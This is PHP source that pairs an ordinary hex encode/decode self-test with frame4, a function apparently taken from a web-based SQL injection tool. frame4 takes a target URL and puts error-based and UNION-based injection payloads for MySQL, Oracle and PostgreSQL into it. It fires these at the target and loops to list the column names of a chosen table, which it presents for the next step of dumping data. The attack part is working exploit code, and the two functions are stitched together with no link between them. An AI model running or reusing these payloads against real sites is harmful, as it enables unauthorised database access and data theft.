function testHex() { $hasErrors = false; $allBytes = ''; for ($i = 0; $i < 256; $i++) { $allBytes .= chr($i); } $allBytesHex = hexEncode($allBytes); printf("hexEncode(allBytes) = %s\n", $allBytesHex); $allBytesHexUpper = hexEncodeUpper($allBytes); printf("hexEncodeUpper(allBytes) = %s\n\n", $allBytesHexUpper); $allBytes = hexDecode($allBytesHex); printf("hexDecode(allBytesHexLower) ret = %u: ", $allBytes === false ? 1 : 0); $good = true; for ($i = 0; $i < 256; $i++) { if ($i != ord($allBytes[$i])) { $good = false; } } if ($allBytes === false || !$good) { $hasErrors = true; } printf("%s\n", $good ? "good" : "bad"); $allBytes = hexDecode($allBytesHexUpper); printf("hexDecode(allBytesHexUpper) ret = %u: ", $allBytes === false ? 1 : 0); $good = true; for ($i = 0; $i < 256; $i++) { if ($i != ord($allBytes[$i])) { $good = false; } } if ($allBytes === false || !$good) { $hasErrors = true; } printf("%s\n", $good ? "good" : "bad"); $allBytes = hexDecodeLower($allBytesHex); printf("hexDecodeLower(allBytesHexLower) ret = %u: ", $allBytes === false ? 1 : 0); $good = true; for ($i = 0; $i < 256; $i++) { if ($i != ord($allBytes[$i])) { $good = false; } } if ($allBytes === false || !$good) { $hasErrors = true; } printf("%s\n", $good ? "good" : "bad"); $allBytes = hexDecodeUpper($allBytesHexUpper); printf("hexDecodeUpper(allBytesHexUpper) ret = %u: ", $allBytes === false ? 1 : 0); $good = true; for ($i = 0; $i < 256; $i++) { if ($i != ord($allBytes[$i])) { $good = false; } } if ($allBytes === false || !$good) { $hasErrors = true; } printf("%s\n", $good ? "good" : "bad"); printf("\nShould error:\n"); $allBytes = hexDecodeLower($allBytesHexUpper); printf("hexDecodeLower(allBytesHexUpper) ret = %u\n", $allBytes === false ? 1 : 0, $allBytes === false ? "good" : "bad"); if ($allBytes !== false) { $hasErrors = true; } $allBytes = hexDecodeUpper($allBytesHex); printf("hexDecodeUpper(allBytesHexLower) ret = %u\n", $allBytes === false ? 1 : 0, $allBytes === false ? "good" : "bad"); if ($allBytes !== false) { $hasErrors = true; } if ($hasErrors) { printf("*** FAILED ***\n"); } else { printf("*** PASSED ***\n"); } return $hasErrors; }
function frame4() { html_header(); global $a, $payload_error, $b, $payload_union, $databas, $c, $payload_oracle, $d, $payload_postgre; if (isset($_POST['columnas'])) { $url = $_POST["url"]; $table_n = $_POST['nombre']; $database = $_POST['database']; $vuln_index = $_POST["lol"]; $sobras = $_POST['sobras']; $tabla = asciiEncode($table_n); if ($_POST['columnas'] == 'columns e-b') { $mode = "mysql_error"; $query = $a[$vuln_index - 1]; $querys = str_replace("{$payload_error}", "(SELECT+1906+FROM(SELECT+COUNT(%2A),CONCAT(0x3a6f79753a,(SELECT+MID((IFnull(CAST(COUNT(%2A)+AS+CHAR),0x20)),1,50)+FROM+INFORMATION_SCHEMA.COLUMNS+WHERE+table_name%3D{$table_n}+AND+table_schema%3D" . $database . "),0x3a70687a3a,floor(rand(0)%2A2))x+FROM+INFORMATION_SCHEMA.CHARACTER_SETS+GROUP+BY+x)a)", $query); } elseif ($_POST['columnas'] == 'columns u-q') { $mode = "mysql_union"; $query = $b[$vuln_index - 1]; $querys = str_replace("{$payload_union}", "CONCAT(0x3a6f79753a,IFnull(CAST(COUNT(*)%20AS%20CHAR),0x20),0x3a70687a3a)", $query); $querys = str_replace("%23", "%20FROM%20INFORMATION_SCHEMA.COLUMNS%20WHERE%20table_name%3D" . $table_n . "%20AND%20table_schema%3D" . $database . "%23", $querys); } elseif ($_POST['columnas'] == 'columns o-eb') { $mode = "oracle_error"; $query = $c[$vuln_index - 1]; $table_n = asciiEncode($table_n); $table_n3 = CHRize($table_n); $querys = str_replace("{$payload_oracle}", "(REPLACE(REPLACE(REPLACE(REPLACE((SELECT%20NVL(CAST(COUNT(*)%20AS%20VARCHAR(4000))%2CCHR(32))%20FROM%20SYS.ALL_TAB_COLUMNS%20WHERE%20TABLE_NAME%3D" . $table_n3 . ")%2CCHR(32)%2CCHR(58)||CHR(121)||CHR(58))%2CCHR(36)%2CCHR(58)||CHR(109)||CHR(58))%2CCHR(64)%2CCHR(58)||CHR(109)||CHR(58))%2CCHR(35)%2CCHR(58)||CHR(102)||CHR(58)))", $query); } elseif ($_POST['columnas'] == 'columns pg') { $mode = "postgre_error"; $query = $d[$vuln_index - 1]; $table_n = asciiEncode($table_n); $table_n3 = CHRize($table_n); $querys = str_replace("{$payload_postgre}", "(SELECT%20COALESCE(CAST(COUNT(*)%20AS%20CHARACTER(10000))%2C(CHR(32)))%20FROM%20pg_namespace,pg_type,pg_attribute%20b%20JOIN%20pg_class%20a%20ON%20a.oid%3Db.attrelid%20WHERE%20a.relnamespace%3Dpg_namespace.oid%20AND%20pg_type.oid%3Db.atttypid%20AND%20attnum>0%20AND%20a.relname%3D(" . $table_n3 . ")%20AND%20nspname%3D(CHR(112)||CHR(117)||CHR(98)||CHR(108)||CHR(105)||CHR(99)))", $query); } echo "\n\t\t\t\t<form action=\"" . $_SERVER['PHP_SELF'] . "?frame=15\" target=\"_blank\" method=\"post\" name=\"datos\" id=\"datos\">\n\t\t\t\t<input type=\"hidden\" name=\"url\" id=\"url\" value=\"{$url}\"/>\n\t\t\t\t\t<input type=\"hidden\" name=\"sobras\" id=\"sobras\" value=\"{$sobras}\"/>\n\t\t\t\t\t<input type=\"hidden\" name=\"database\" id=\"database\" value=\"{$database}\"/>\n\t\t\t\t<input type=\"hidden\" name=\"tn\" id=\"tn\" value=\"{$tabla}\"/>\n\t\t\t\t"; if ($mode == "mysql_error") { $query_n = str_replace("{$payload_error}", '(SELECT%205724%20FROM(SELECT%20COUNT(%2A),CONCAT(0x3a6f79753a,(SELECT%20MID((IFnull(CAST(column_name%20AS%20CHAR),0x20)),1,50)%20FROM%20INFORMATION_SCHEMA.COLUMNS%20WHERE%20table_name%3D' . $table_n . '%20AND%20table_schema%3D' . $database . '%20LIMIT%20$i,1),0x3a70687a3a,floor(rand(0)%2A2))x%20FROM%20INFORMATION_SCHEMA.CHARACTER_SETS%20GROUP%20BY%20x)a)', $query); $i = 0; $count = GetBetween(get_url($url . $querys . $sobras)) - 1; $datos = "data e-b"; } elseif ($mode == "mysql_union") { $query_n = str_replace("{$payload_union}", '(SELECT%20CONCAT(0x3a6f79753a,IFnull(CAST(column_name%20AS%20CHAR),0x20),0x3a70687a3a)%20FROM%20INFORMATION_SCHEMA.COLUMNS%20WHERE%20table_name%3D' . $table_n . '%20AND%20table_schema%3D' . $database . '%20LIMIT%20$i,1)', $query); $i = 0; $count = GetBetween(get_url($url . $querys . $sobras)) - 1; $datos = "data u-q"; } elseif ($mode == "oracle_error") { $query_n = str_replace("{$payload_oracle}", '(REPLACE(REPLACE(REPLACE(REPLACE((SELECT%20NVL(CAST(COLUMN_NAME%20AS%20VARCHAR(4000))%2CCHR(32))%20FROM%20(SELECT%20COLUMN_NAME%2CDATA_TYPE%2CROWNUM%20AS%20LIMIT%20FROM%20SYS.ALL_TAB_COLUMNS%20WHERE%20TABLE_NAME%3D' . $table_n3 . '%20ORDER%20BY%201%20ASC)%20WHERE%20LIMIT%3D$i)%2CCHR(32)%2CCHR(58)||CHR(121)||CHR(58))%2CCHR(36)%2CCHR(58)||CHR(109)||CHR(58))%2CCHR(64)%2CCHR(58)||CHR(109)||CHR(58))%2CCHR(35)%2CCHR(58)||CHR(102)||CHR(58)))', $query); $i = 1; $count = GetBetween(get_url($url . $querys . $sobras)); $datos = "data o-eb"; } elseif ($mode == "postgre_error") { $query_n = str_replace("{$payload_postgre}", '(SELECT%20COALESCE(CAST(attname%20AS%20CHARACTER(10000)),(CHR(32)))%20FROM%20pg_namespace,pg_type,pg_attribute%20b%20JOIN%20pg_class%20a%20ON%20a.oid%3Db.attrelid%20WHERE%20a.relnamespace%3Dpg_namespace.oid%20AND%20pg_type.oid%3Db.atttypid%20AND%20attnum%3E0%20AND%20a.relname%3D(' . $table_n3 . ')%20AND%20nspname%3D(CHR(112)||CHR(117)||CHR(98)||CHR(108)||CHR(105)||CHR(99))%20OFFSET%20$i%20LIMIT%201)', $query); $i = 0; $count = GetBetween(get_url($url . $querys . $sobras)) - 1; $datos = "data pg"; } while ($i <= $count) { $query_nombre = str_replace('$i', "{$i}", $query_n); $nombre = GetBetween(get_url($url . $query_nombre . $sobras)); echo "<input type=\"checkbox\" name=\"nombre[]\" id=\"nombre\" value=\"" . hexEncode($nombre) . "\">{$nombre}</input><br>"; $i++; } echo "<input type=\"hidden\" name=\"lol\" id=\"lol\" value=\"{$vuln_index}\"/>"; echo "<input type=\"submit\" name=\"datos\" id=\"datos\" value=\"{$datos}\"/>"; echo "</form>"; } }